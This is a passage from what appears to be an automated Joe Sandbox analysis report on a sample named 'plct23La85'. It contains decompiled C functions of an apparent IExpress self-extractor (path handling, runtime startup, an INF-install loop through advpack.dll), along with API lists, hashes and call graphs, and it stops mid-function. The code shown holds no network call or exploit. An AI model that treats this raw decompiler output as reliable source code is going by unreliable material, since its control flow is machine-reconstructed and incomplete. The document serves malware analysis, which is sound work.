                                                                                                                                                                                                    • Instruction Fuzzy Hash: 650167B29002557BDF304BA65C4DEEB767CEBC5B11F140219F915E2180D761C784C6B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                    			E001365E8(char* __ecx) {
                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                    				do {
                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x001365e8
                                                                                                                                                                                                    0x001365ed
                                                                                                                                                                                                    0x001365ef
                                                                                                                                                                                                    0x001365f2
                                                                                                                                                                                                    0x001365f4
                                                                                                                                                                                                    0x001365f4
                                                                                                                                                                                                    0x001365f6
                                                                                                                                                                                                    0x001365f7
                                                                                                                                                                                                    0x00136608
                                                                                                                                                                                                    0x00136611
                                                                                                                                                                                                    0x00136618
                                                                                                                                                                                                    0x0013661c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013660e
                                                                                                                                                                                                    0x00136623
                                                                                                                                                                                                    0x00136625
                                                                                                                                                                                                    0x0013663b
                                                                                                                                                                                                    0x0013663b
                                                                                                                                                                                                    0x0013663d
                                                                                                                                                                                                    0x00136641
                                                                                                                                                                                                    0x00136610
                                                                                                                                                                                                    0x00136610
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00136610
                                                                                                                                                                                                    0x00136644
                                                                                                                                                                                                    0x00136647
                                                                                                                                                                                                    0x00136647
                                                                                                                                                                                                    0x00136621
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00132B33), ref: 00136602
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00136612
                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00136629
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00136635
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                    • Opcode ID: 5e88de13cdd5b49c5ac6743dfbdea42c09a9fd6bf0a19e3abeef3c98a000b82a
                                                                                                                                                                                                    • Instruction ID: 9cc3f64cbfedae9415dca7986afee690df2ca3690efde26cb91dce03f63e6f5e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e88de13cdd5b49c5ac6743dfbdea42c09a9fd6bf0a19e3abeef3c98a000b82a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2F028B20041507EE7321B288C88CBBBF9CCF97395F2941AFE5D692411D7150D468671
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E001369B0() {
                                                                                                                                                                                                    				intOrPtr* _t4;
                                                                                                                                                                                                    				intOrPtr* _t5;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				 *0x1381f8 = E00136C70();
                                                                                                                                                                                                    				__set_app_type(E00136FBE(2));
                                                                                                                                                                                                    				 *0x1388a4 =  *0x1388a4 | 0xffffffff;
                                                                                                                                                                                                    				 *0x1388a8 =  *0x1388a8 | 0xffffffff;
                                                                                                                                                                                                    				_t4 = __p__fmode();
                                                                                                                                                                                                    				_t11 =  *0x138528; // 0x0
                                                                                                                                                                                                    				 *_t4 = _t11;
                                                                                                                                                                                                    				_t5 = __p__commode();
                                                                                                                                                                                                    				_t12 =  *0x13851c; // 0x0
                                                                                                                                                                                                    				 *_t5 = _t12;
                                                                                                                                                                                                    				_t6 = E00137000();
                                                                                                                                                                                                    				if( *0x138000 == 0) {
                                                                                                                                                                                                    					__setusermatherr(E00137000);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001371EF(_t6);
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x001369b7
                                                                                                                                                                                                    0x001369c2
                                                                                                                                                                                                    0x001369c8
                                                                                                                                                                                                    0x001369cf
                                                                                                                                                                                                    0x001369d8
                                                                                                                                                                                                    0x001369de
                                                                                                                                                                                                    0x001369e4
                                                                                                                                                                                                    0x001369e6
                                                                                                                                                                                                    0x001369ec
                                                                                                                                                                                                    0x001369f2
                                                                                                                                                                                                    0x001369f4
                                                                                                                                                                                                    0x00136a00
                                                                                                                                                                                                    0x00136a07
                                                                                                                                                                                                    0x00136a0d
                                                                                                                                                                                                    0x00136a0e
                                                                                                                                                                                                    0x00136a15

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00136FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00136FC5
                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 001369C2
                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 001369D8
                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 001369E6
                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00136A07
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1632413811-0
                                                                                                                                                                                                    • Opcode ID: cb46b1dea20fb0c289071b18920927e7773b99db6431f42997566d5caec04ddf
                                                                                                                                                                                                    • Instruction ID: db476d18013a1b0a98eec0c557ac32beae4298a3d36391072ea2f64b22aa85e8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb46b1dea20fb0c289071b18920927e7773b99db6431f42997566d5caec04ddf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F015B0108301DFD729AB30EE0A6097BA1FB25331F504A09F4A286AF1CF7A85C5CB11
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                    callgraph 0 Function_00FD4EFD 21 Function_00FD6CE0 0->21 67 Function_00FD4980 0->67 83 Function_00FD4B60 0->83 1 Function_00FD70FE 2 Function_00FD66F9 3 Function_00FD2BFB 37 Function_00FD52B6 3->37 42 Function_00FD2CAA 3->42 57 Function_00FD1F90 3->57 104 Function_00FD2F1D 3->104 4 Function_00FD6EF0 5 Function_00FD34F0 24 Function_00FD43D0 5->24 36 Function_00FD44B9 5->36 68 Function_00FD3680 5->68 6 Function_00FD6CF0 7 Function_00FD3FEF 7->21 7->36 63 Function_00FD6285 7->63 108 Function_00FD411B 7->108 8 Function_00FD71EF 9 Function_00FD6BEF 10 Function_00FD36EE 13 Function_00FD28E8 10->13 10->21 27 Function_00FD67C9 10->27 10->36 60 Function_00FD2A89 10->60 105 Function_00FD681F 10->105 11 Function_00FD17EE 11->21 12 Function_00FD1AE8 12->21 29 Function_00FD66C8 12->29 12->36 39 Function_00FD16B3 12->39 40 Function_00FD2AAC 12->40 62 Function_00FD658A 12->62 64 Function_00FD1A84 12->64 65 Function_00FD1781 12->65 66 Function_00FD1680 12->66 107 Function_00FD171E 12->107 13->60 75 Function_00FD2773 13->75 14 Function_00FD65E8 15 Function_00FD70EB 16 Function_00FD51E5 16->36 59 Function_00FD468F 16->59 16->63 17 Function_00FD1FE1 18 Function_00FD4FE0 18->0 18->36 18->59 19 Function_00FD47E0 19->36 19->66 20 Function_00FD31E0 21->6 22 Function_00FD24E0 22->21 22->62 23 Function_00FD19E0 23->21 23->24 24->21 25 Function_00FD4CD0 25->19 25->21 53 Function_00FD4E99 25->53 25->67 77 Function_00FD476D 25->77 25->83 96 Function_00FD4C37 25->96 119 Function_00FD4702 25->119 26 Function_00FD4AD0 26->68 58 Function_00FD6793 27->58 28 Function_00FD58C8 28->36 28->62 28->63 28->66 92 Function_00FD6648 29->92 30 Function_00FD17C8 31 Function_00FD4CC0 32 Function_00FD4BC0 33 Function_00FD30C0 34 Function_00FD63C0 34->21 34->62 34->65 35 Function_00FD6FBE 87 Function_00FD6F54 35->87 36->21 36->27 36->66 36->105 36->107 37->14 37->17 37->21 56 Function_00FD2390 37->56 37->65 38 Function_00FD69B0 38->8 38->35 74 Function_00FD6C70 38->74 117 Function_00FD7000 38->117 39->65 40->14 40->21 40->30 40->66 41 Function_00FD66AE 42->10 42->21 42->36 49 Function_00FD18A3 42->49 52 Function_00FD5C9E 42->52 42->56 42->59 110 Function_00FD6517 42->110 43 Function_00FD6FA5 91 Function_00FD724D 43->91 44 Function_00FD1EA7 76 Function_00FD256D 44->76 45 Function_00FD53A1 45->21 45->62 45->66 45->107 46 Function_00FD6FA1 47 Function_00FD55A0 47->21 47->36 47->59 47->62 47->63 47->65 70 Function_00FD597D 47->70 80 Function_00FD5467 47->80 90 Function_00FD6952 47->90 97 Function_00FD2630 47->97 47->110 48 Function_00FD4CA0 49->11 49->21 50 Function_00FD3BA2 50->7 50->12 50->21 50->36 55 Function_00FD6495 50->55 50->59 50->63 50->65 81 Function_00FD2267 50->81 98 Function_00FD202A 50->98 51 Function_00FD72A2 52->20 52->21 52->29 52->36 52->62 52->66 71 Function_00FD667F 52->71 99 Function_00FD6E2A 52->99 109 Function_00FD5C17 52->109 53->66 54 Function_00FD6298 54->21 54->107 55->21 55->62 55->65 56->21 56->39 56->56 56->62 56->66 57->21 57->36 57->44 61 Function_00FD268B 61->21 61->36 61->107 62->39 64->71 66->65 67->36 72 Function_00FD487A 67->72 69 Function_00FD6380 70->21 70->36 70->61 70->63 71->92 113 Function_00FD490C 72->113 73 Function_00FD7270 75->21 75->62 75->65 75->66 76->22 77->41 77->110 78 Function_00FD4169 78->36 78->59 79 Function_00FD5164 79->36 79->54 79->59 80->21 80->28 80->45 80->62 80->63 80->65 80->66 80->70 81->21 81->62 81->107 82 Function_00FD7060 102 Function_00FD7120 82->102 111 Function_00FD7010 82->111 84 Function_00FD6760 85 Function_00FD6A60 85->3 85->82 86 Function_00FD7155 85->86 85->91 95 Function_00FD6C3F 85->95 114 Function_00FD7208 85->114 87->91 87->114 88 Function_00FD4A50 89 Function_00FD3450 89->24 93 Function_00FD6F40 94 Function_00FD3A3F 94->36 94->59 94->63 94->110 97->21 97->36 98->21 98->36 98->62 98->107 99->6 100 Function_00FD4224 100->36 100->66 101 Function_00FD3B26 101->18 101->54 101->110 103 Function_00FD6A20 104->16 104->21 104->36 104->47 104->50 104->62 104->63 104->76 104->78 104->79 104->94 104->101 106 Function_00FD621E 104->106 105->2 105->21 106->21 106->36 106->63 106->70 108->44 110->36 112 Function_00FD3210 112->24 112->28 112->36 112->62 112->70 112->100 115 Function_00FD3100 115->24 116 Function_00FD4200 118 Function_00FD6C03 118->91 119->39 119->66

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 36 fd3ba2-fd3bd9 37 fd3bfd-fd3bff 36->37 38 fd3bdb-fd3bee call fd468f 36->38 39 fd3c03-fd3c28 memset 37->39 46 fd3bf4-fd3bf7 38->46 47 fd3d13-fd3d30 call fd44b9 38->47 41 fd3c2e-fd3c40 call fd468f 39->41 42 fd3d35-fd3d48 call fd1781 39->42 41->47 53 fd3c46-fd3c49 41->53 48 fd3d4d-fd3d52 42->48 46->37 46->47 58 fd3f4d 47->58 51 fd3d9e-fd3db6 call fd1ae8 48->51 52 fd3d54-fd3d6c call fd468f 48->52 51->58 69 fd3dbc-fd3dc2 51->69 52->47 65 fd3d6e-fd3d75 52->65 53->47 56 fd3c4f-fd3c56 53->56 61 fd3c58-fd3c5e 56->61 62 fd3c60-fd3c65 56->62 59 fd3f4f-fd3f63 call fd6ce0 58->59 66 fd3c6e-fd3c73 61->66 67 fd3c75-fd3c7c 62->67 68 fd3c67-fd3c6d 62->68 71 fd3d7b-fd3d98 CompareStringA 65->71 72 fd3fda-fd3fe1 65->72 73 fd3c87-fd3c89 66->73 67->73 76 fd3c7e-fd3c82 67->76 68->66 74 fd3dc4-fd3dce 69->74 75 fd3de6-fd3de8 69->75 71->51 71->72 79 fd3fe8-fd3fea 72->79 80 fd3fe3 call fd2267 72->80 73->48 82 fd3c8f-fd3c98 73->82 74->75 81 fd3dd0-fd3dd7 74->81 77 fd3dee-fd3df5 75->77 78 fd3f0b-fd3f15 call fd3fef 75->78 76->73 83 fd3fab-fd3fd2 call fd44b9 LocalFree 77->83 84 fd3dfb-fd3dfd 77->84 94 fd3f1a-fd3f1c 78->94 79->59 80->79 81->75 87 fd3dd9-fd3ddb 81->87 88 fd3c9a-fd3c9c 82->88 89 fd3cf1-fd3cf3 82->89 83->58 84->78 92 fd3e03-fd3e0a 84->92 87->77 95 fd3ddd-fd3de1 call fd202a 87->95 90 fd3c9e-fd3ca3 88->90 91 fd3ca5-fd3ca7 88->91 89->51 93 fd3cf9-fd3d11 call fd468f 89->93 98 fd3cb2-fd3cc5 call fd468f 90->98 91->58 99 fd3cad 91->99 92->78 100 fd3e10-fd3e19 call fd6495 92->100 93->47 93->48 102 fd3f1e-fd3f2d LocalFree 94->102 103 fd3f46-fd3f47 LocalFree 94->103 95->75 98->47 112 fd3cc7-fd3ce8 CompareStringA 98->112 99->98 113 fd3e1f-fd3e36 GetProcAddress 100->113 114 fd3f92-fd3fa9 call fd44b9 100->114 108 fd3fd7-fd3fd9 102->108 109 fd3f33-fd3f3b 102->109 103->58 108->72 109->39 112->89 115 fd3cea-fd3ced 112->115 116 fd3e3c-fd3e80 113->116 117 fd3f64-fd3f76 call fd44b9 FreeLibrary 113->117 126 fd3f7c-fd3f90 LocalFree call fd6285 114->126 115->89 120 fd3e8b-fd3e94 116->120 121 fd3e82-fd3e87 116->121 117->126 124 fd3e9f-fd3ea2 120->124 125 fd3e96-fd3e9b 120->125 121->120 128 fd3ead-fd3eb6 124->128 129 fd3ea4-fd3ea9 124->129 125->124 126->58 131 fd3eb8-fd3ebd 128->131 132 fd3ec1-fd3ec3 128->132 129->128 131->132 133 fd3ece-fd3eec 132->133 134 fd3ec5-fd3eca 132->134 137 fd3eee-fd3ef3 133->137 138 fd3ef5-fd3efd 133->138 134->133 137->138 139 fd3eff-fd3f09 FreeLibrary 138->139 140 fd3f40 FreeLibrary 138->140 139->102 140->103
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00FD3BA2() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				short _v300;
                                                                                                                                                                                                    				intOrPtr _v304;
                                                                                                                                                                                                    				void _v348;
                                                                                                                                                                                                    				char _v352;
                                                                                                                                                                                                    				intOrPtr _v356;
                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                    				short _v364;
                                                                                                                                                                                                    				char* _v368;
                                                                                                                                                                                                    				intOrPtr _v372;
                                                                                                                                                                                                    				void* _v376;
                                                                                                                                                                                                    				intOrPtr _v380;
                                                                                                                                                                                                    				char _v384;
                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                    				intOrPtr _v392;
                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                    				void* _v408;
                                                                                                                                                                                                    				void* _v424;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                    				short _t96;
                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                    				intOrPtr _t98;
                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                    				signed int _t104;
                                                                                                                                                                                                    				signed int _t108;
                                                                                                                                                                                                    				int _t112;
                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                    				signed char _t118;
                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                    				short _t137;
                                                                                                                                                                                                    				char* _t140;
                                                                                                                                                                                                    				signed char _t144;
                                                                                                                                                                                                    				signed char _t145;
                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                    				_t69 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                    				 *0xfd9124 =  *0xfd9124 & 0;
                                                                                                                                                                                                    				_t149 = 0;
                                                                                                                                                                                                    				_v388 = 0;
                                                                                                                                                                                                    				_v384 = 0;
                                                                                                                                                                                                    				_t165 =  *0xfd8a28 - _t153; // 0x0
                                                                                                                                                                                                    				if(_t165 != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                    						if( *0xfd8c42 != 0) {
                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                    						_t115 = E00FD468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                    							E00FD44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    							 *0xfd9124 = 0x80070714;
                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                    										_t76 = E00FD1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                    											return E00FD6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                    												_t79 = E00FD3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                    													__eflags =  *0xfd8580;
                                                                                                                                                                                                    													if( *0xfd8580 != 0) {
                                                                                                                                                                                                    														E00FD2267();
                                                                                                                                                                                                    													}
                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                    											__eflags =  *0xfd8180;
                                                                                                                                                                                                    											if( *0xfd8180 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                    												E00FD44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                    												 *0xfd9124 = 0x8007042b;
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0xfd9a34 & 0x00000004;
                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t129 = E00FD6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                    												E00FD44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                    												 *0xfd9124 = E00FD6285();
                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                    												E00FD44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags =  *0xfd8a30;
                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                    											_t96 =  *0xfd9a40; // 0x3
                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                    											_t97 =  *0xfd8a38 & 0x0000ffff;
                                                                                                                                                                                                    											_v380 = 0xfd9154;
                                                                                                                                                                                                    											_v376 = _t151;
                                                                                                                                                                                                    											_v372 = 0xfd91e4;
                                                                                                                                                                                                    											_v360 = _t97;
                                                                                                                                                                                                    											if( *0xfd8a30 != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t144 =  *0xfd9a34; // 0x1
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                    											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                    											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                    												__eflags = _t97;
                                                                                                                                                                                                    												_v360 = _t97;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t145 =  *0xfd8d48; // 0x0
                                                                                                                                                                                                    											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                    											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                    												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                    												__eflags = _t97;
